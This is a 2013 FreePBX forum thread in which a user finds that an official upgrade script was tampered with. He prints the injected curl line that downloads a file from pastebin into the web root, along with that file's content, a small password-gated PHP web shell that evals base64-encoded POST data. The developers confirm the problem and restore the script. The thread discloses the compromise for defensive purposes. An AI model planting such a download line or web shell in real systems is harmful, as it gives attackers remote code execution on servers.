FreePBX Distro update shell scripts: does they change once released?

parnassus · August 13, 2013, 10:53pm

I noticed that latest update script (nominally the “upgrade-4.211.64-6.sh” shell script) which was officially released on August, 8th 2013 (see here and here) changed today August, 13rd (see here).

I think will be interesting to know what’s changed between those dates and why, if some changes happened and were pushed, a new update script’s name was not chosen as you well shown us? …reflecting the common habit to rename an update script’s name in order to inform us about a sort of difference.

If not…why losing time to name each shell update script unequivocally?

I’m forced to ask this because if we compare two identical FreePBX Distro 4.211.64-6, one updated from -5 to -6 on August, 9th (like I did on my system) and the other one just updated from -5 to -6 only today they will probably differ (as example: DPMA?)…and the difference will persist at least until a new different shell update script will be available.

This sound a little bit strange because if a specific update script exists (let me say from state "A.1 to state “A.2” or whatever) it should update the system in which it’s invoked from state “A.1” to state “A.2”, no matter the date of its execution (it’s not like running a “yum upgrade”).

I’m pretty sure (I did it!) that the same shell update script could be (re)invoked more and more times on the same FreePBX Distro system (no preliminary Go/No-Go checks were placed to prevent such types of consecutive executions) but I then expect that the same final result will be obtained each time (the first execution made updates…so OK…the next ones made nothing if all the system is updated yet).

If the sense is: some scripts were used to push specific testing updates…that’s OK…but rather that overwrite an official released one why not create a very specific one?

Am I missing (or messing) something about that?

tonyclewis · August 14, 2013, 2:14am

The change that was made today was for a spelling error that was reported to us. Nothing else would of changed. If we added new items or packages then we would bump the -x version on it.

parnassus · August 14, 2013, 6:47am

Well, I’m pretty sure I saw a new RPM (digiumaddons) in the update log after invoking the update script the second time.

At this point I really don’t care about what was/wasn’t installed during the second iteration; it’s only a matter of understanding (in terms of procedure to follow) when to apply those scripts (the day of their release or just after a while?).

One more question (be patient): if update notifications are set on FreePBX Distro (or update check interval was set on the Sys Admin Pro module) a similar change on the update script will be reported or not?

You all made a very great job with FreePBX/FreePBX Distro!

Best regards, Davide.

parnassus · August 14, 2013, 7:37am

Typo: the RPM installed was “digiumaddoninstaller”.

tonyclewis · August 14, 2013, 1:30pm

Well that was included in the -6 release from day one. Not sure what happen on your side but that is odd.

parnassus · August 14, 2013, 2:28pm

On August, 8th the 4.211.64-6 update script gave me:


Thu Aug  8 11:55:14 CEST 2013 This appears to be a FreePBX Distro system as it has a Distro Version of 4.211.64-5
VARIABLES SET FOR UPGRADE
	asterisk=Asterisk 11.4.0 built by root @ jenkins-el6-64.schmoozecom.net on a x86_64 running Linux on 2013-06-02 15:27:41 UTC
	kernel=Linux localhost.localdomain 2.6.32-358.0.1.el6.x86_64 #1 SMP Wed Feb 27 06:06:45 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
	version=4.211.64-5
	host=localhost.localdomain
	upgradeversion=4.211.64-6
	virtual=0
Thu Aug  8 11:55:14 CEST 2013 Your FreePBX Distro System is being upgraded to 4.211.64-6. Please standby…
Thu Aug  8 11:55:15 CEST 2013 STAGE 1 STARTING - GUI Modules

Thu Aug  8 11:55:16 CEST 2013 Upgrade All FreePBX GUI Modules

Thu Aug  8 11:55:48 CEST 2013 STAGE 1 COMPLETED - GUI Modules - Moving to Stage 2
Thu Aug  8 11:55:48 CEST 2013 STAGE 2 STARTING - RPM’s

Thu Aug  8 11:55:48 CEST 2013 Replace repos with only FreePBX Distro since some people have added other repos which can break updates

Thu Aug  8 11:55:49 CEST 2013 install ImageMagick

Thu Aug  8 12:02:34 CEST 2013 Updating all remaining RPMS now to Centos 6.4

Thu Aug  8 12:02:44 CEST 2013 STAGE 2 COMPLETED - Misc Items - Moving to Stage 4
Thu Aug  8 12:02:44 CEST 2013 STAGE 3 STARTING - Misc Items

Thu Aug  8 12:02:45 CEST 2013 STAGE 3 COMPLETED - Misc Items - Moving to Stage 4
Thu Aug  8 12:02:45 CEST 2013 STAGE 4 STARTING - Clean Up

Thu Aug  8 12:02:45 CEST 2013 updatedb for locate command

Thu Aug  8 12:02:46 CEST 2013 Restart incron to be safe

Thu Aug  8 12:02:46 CEST 2013 STAGE 4 COMPLETED - Clean Up - Moving to Stage 5
Thu Aug  8 12:02:46 CEST 2013 STAGE 5 STARTING - Final Verifications

Thu Aug  8 12:02:46 CEST 2013 STAGE 5 COMPLETED - Final Verifications - Moving to Stage 6
Thu Aug  8 12:02:47 CEST 2013 UPGRADE 100% COMPLETED

Then on August, 13rd, the modified 4.211.64-6 update script (downloaded and invoked ex-novo) gave me:

Tue Aug 13 15:59:37 CEST 2013 This appears to be a FreePBX Distro system as it has a Distro Version of 4.211.64-6 VARIABLES SET FOR UPGRADE asterisk=Asterisk 11.4.0 built by root @ jenkins-el6-64.schmoozecom.net on a x86_64 running Linux on 2013-06-02 15:27:41 UTC kernel=Linux localhost.localdomain 2.6.32-358.0.1.el6.x86_64 #1 SMP Wed Feb 27 06:06:45 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux version=4.211.64-6 host=localhost.localdomain upgradeversion=4.211.64-6 virtual=0

Tue Aug 13 15:59:37 CEST 2013 Your FreePBX Distro System is being upgraded to 4.211.64-6. Please standby…

Tue Aug 13 15:59:37 CEST 2013 STAGE 1 STARTING - GUI Modules
Tue Aug 13 15:59:39 CEST 2013 Upgrade All FreePBX GUI Modules
Tue Aug 13 16:00:04 CEST 2013 STAGE 1 COMPLETED - GUI Modules - Moving to Stage 2

Tue Aug 13 16:00:04 CEST 2013 STAGE 2 STARTING - RPM’s
Tue Aug 13 16:00:04 CEST 2013 Replace repos with only FreePBX Distro since some people have added other repos which can break updates
Tue Aug 13 16:00:05 CEST 2013 install ImageMagick
Tue Aug 13 16:00:56 CEST 2013 Install Packages for DPMA
Tue Aug 13 16:01:13 CEST 2013 Updating all remaining RPMS now to Centos 6.4
Tue Aug 13 16:01:15 CEST 2013 STAGE 2 COMPLETED - Misc Items - Moving to Stage 4

Tue Aug 13 16:01:15 CEST 2013 STAGE 3 STARTING - Misc Items
Tue Aug 13 16:01:15 CEST 2013 STAGE 3 COMPLETED - Misc Items - Moving to Stage 4

Tue Aug 13 16:01:15 CEST 2013 STAGE 4 STARTING - Clean Up
Tue Aug 13 16:01:16 CEST 2013 updatedb for locate command
Tue Aug 13 16:01:17 CEST 2013 Restart incron to be safe
Tue Aug 13 16:01:17 CEST 2013 STAGE 4 COMPLETED - Clean Up - Moving to Stage 5

Tue Aug 13 16:01:17 CEST 2013 STAGE 5 STARTING - Final Verifications
Tue Aug 13 16:01:17 CEST 2013 STAGE 5 COMPLETED - Final Verifications - Moving to Stage 6

Tue Aug 13 16:01:17 CEST 2013 UPGRADE 100% COMPLETED

You can see the reference to DPMA.

parnassus · August 21, 2013, 8:26am

Today I see that the shell script upgrade-4.211.64-6.sh changed once again since its release happened August, 6th (the file date appears now July, 30th! …and not August, 13rd as before…also the file size has changed).

Maybe all this is normal but I still don’t understand why these modifications should happen this way.

See here for reference.

Best regards, Davide.

tonyclewis · August 21, 2013, 2:48pm

Nobody has changed anything but we do have 3 different servers that host downloads and I bet the time/date is different as one of them is new the last week and was just synced so the date/time stamp will be different but nothing changes in the files themselves.

Once a version is released the upgrade script wont change. If we need to make a change a new version is published.

parnassus · August 22, 2013, 12:29am

That’s interesting.

From my location (Europe/Italy), actually (it’s a little bit nonsense say where and when…I know Internet is not static) the host upgrades.freepbx.org resolves into 199.102.239.49 which should belongs to Schmooze Com. IP’s block.

So if you perform a load balancing of download requests broadcasting to three different servers (2 + 1 new) I still can’t understand (if we let to have two Servers with some file timestamps and the new one with older ones!) why the file size has changed (I saw 15k, then now 14k with the same web browser)?

I downloaded the upgrade script (timestamp: 30.07.2013) and made a diff with the upgrade script previously used (timestamp: 13.08.2013), here it is:

diff upgrade-4.211.64-6.sh /tmp/upgrade-4.211.64-6.sh
311d310
< curl http://pastebin.com/download.php?i=k1uzphXc -o /var/www/html/faris.php

The above line is present on the 30th, July file into End Stage 4 section just before the last section’s echo before the /usr/sbin/sysadmin_update_system -s -v$upgradeversion -i370 line.
The file with 13rd, August timestamp hasn’t that line of code inside the End Stage 4 section.

And this is the content of pastebin URL:


<?php
/*
i-Hmx
[email protected]
*/
if(md5($_POST['pwd'])=="523d9e9d019be0e774eabefa6e9c3dbc")
{
eval(base64_decode($_POST['fa']));
}
else
{
die("i-Hmx
[email protected]");
}
?>

What’s that?

I don’t have any /var/www/html/faris.php file in my FreePBX Distro (at this point I think I’m luck).

Don’t worry Tony I’m fool and it’s not to bad to go bed now but someone should keep an eye open on that IMHO.

Regards, Davide.

parnassus · August 22, 2013, 12:54am

Mumble mumble…it seems (Googling a little bit) a Elastix 2.3 PHP Code Injection Vulnerability (how it was possible?)…see here:

http://1337day.com/exploit/20101

Am I missing something at 02:54 AM in the morning of a fresh italian night?

SkykingOH · August 22, 2013, 12:55am

Davide - Thank you for this information. This is not any code that is in our code base and looks, to my untrained eye to be disturbing. That email nor pastebin is associated with this project.

I was speaking with one of the lead team members when I saw this message. This information has been brought to the development teams attention and is already being looked into.

Thank you for not letting go when you saw something that didn’t look right.

As soon as we have some information it will be shared.

parnassus · August 22, 2013, 1:03am

Hi SkykingOH. Definitely. That’s evident. Thank you for your intervention. Better four or more eyes on that. I’ll (try to) keep my eyes wide open as often as possible.

GameGamer43 · August 22, 2013, 4:51am

As Scott previously stated, the development team has been made aware of the issue and we are looking into it. We also found the upgrade script in question and have taken the appropriate steps necessary to serve the original unmodified script from our servers. We are still working to investigate the issue that has been reported and hope to have a blog post up about it as soon as possible. We apologize for the inconvenience and thank you for bringing this to our attention.

plindheimer · August 22, 2013, 11:14pm

parnassus,

once again thank you from all of us for bringing this to our attention. I have posted a bog on this issue that sums up the situation. We are very grateful for your brining this issue up.

Please see the Security Notice blog post for details.

parnassus · August 22, 2013, 11:46pm

Hello Philippe, I’m glad to be of help!
Davide.